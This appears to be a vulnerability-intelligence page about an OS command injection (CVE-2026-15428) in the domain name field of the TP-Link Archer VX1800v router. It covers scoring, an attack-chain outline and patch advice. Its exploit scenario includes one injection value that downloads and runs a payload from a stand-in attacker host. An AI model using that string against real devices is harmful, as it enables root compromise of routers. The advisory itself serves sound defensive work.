Skip to main content

TP-Link Archer VX1800v CVE-2026-15428

| EUVDEUVD-2026-43963 HIGH
OS Command Injection (CWE-78)
2026-07-14 TPLink GHSA-fxq7-2872-5xg8
8.5
CVSS 4.0 · Vendor: TPLink
Share

Severity by source

Vendor (TPLink) PRIMARY
8.5 HIGH
CVSS:4.0/AV:A/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vuln.today AI
6.8 MEDIUM

Adjacent HTTP interface (AV:A), no special conditions once reached (AC:L), an authenticated admin session is required (PR:H), no user interaction, and root command execution gives full C/I/A impact.

3.1 AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
4.0 AV:A/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Primary rating from Vendor (TPLink).

CVSS VectorVendor: TPLink

CVSS:4.0/AV:A/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Adjacent
Attack Complexity
Low
Privileges Required
High
User Interaction
None
Scope
X

Lifecycle Timeline

2
Analysis Generated
Jul 14, 2026 - 17:34 vuln.today
CVE Published
Jul 14, 2026 - 17:03 cve.org
HIGH 8.5

DescriptionCVE.org

An OS command injection vulnerability exists in Archer VX800v v1 due to insufficient input sanitization of the domain name parameter. An adjacent attacker who can access the relevant HTTP interface can modify the parameter to inject shell metacharacters, resulting in arbitrary code execution with root privileges.

Successful exploitation may allow remote code execution and complete compromise of the device.

AnalysisAI

OS command injection in the TP-Link Archer VX1800v (v1) router lets an adjacent, high-privileged attacker inject shell metacharacters through the domain name parameter of an HTTP management interface, yielding arbitrary command execution as root and full device takeover. The flaw scores CVSS 4.0 8.5 (High) and a vendor firmware patch is available; no public exploit identified at time of analysis. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Gain adjacent network access
Delivery
Authenticate to router web admin (PR:H)
Exploit
Inject shell metacharacters via domain name parameter
Execution
Firmware executes command as root
Impact
Full device compromise and traffic control

Vulnerability AssessmentAI

Exploitation Exploitation requires three concrete prerequisites drawn from the CVSS vector and description: (1) adjacent network position (AV:A) - the attacker must reach the router's HTTP management interface from the same local network segment, not the public internet; (2) high administrative privileges (PR:H) - an authenticated admin session on the web interface is needed to reach the vulnerable configuration workflow; and (3) the ability to set the domain name parameter, which is the specific injectable field where shell metacharacters are not sanitized. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 4.0 vector (AV:A/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H) frames this as high impact but meaningfully gated: exploitation requires adjacent network access (AV:A - same L2/Wi-Fi segment, not the open internet) and high existing privileges (PR:H - an already-authenticated administrative session). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker who has gained a foothold on the local/adjacent network (e.g. a compromised Wi-Fi client or a rogue device on the LAN) and who holds valid administrator access to the router's web interface submits a domain name value containing shell metacharacters such as `example.com; wget http://attacker/x -O /tmp/x; sh /tmp/x`. …
Remediation Patch available per vendor advisory: apply the latest Archer VX1800v firmware from the TP-Link download page (https://www.tp-link.com/en/support/download/archer-vx1800v/#Firmware) and review the FAQ advisory (https://www.tp-link.com/us/support/faq/5189/); an exact fixed version string was not provided in the input, so select the newest build TP-Link publishes for the v1 model. … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 24 hours, complete an inventory of all TP-Link Archer VX1800v (v1) routers across the organization, document current firmware versions, and verify the exact affected models against TP-Link's security advisory (noting the model naming discrepancy in CVE documentation). …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-15428 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy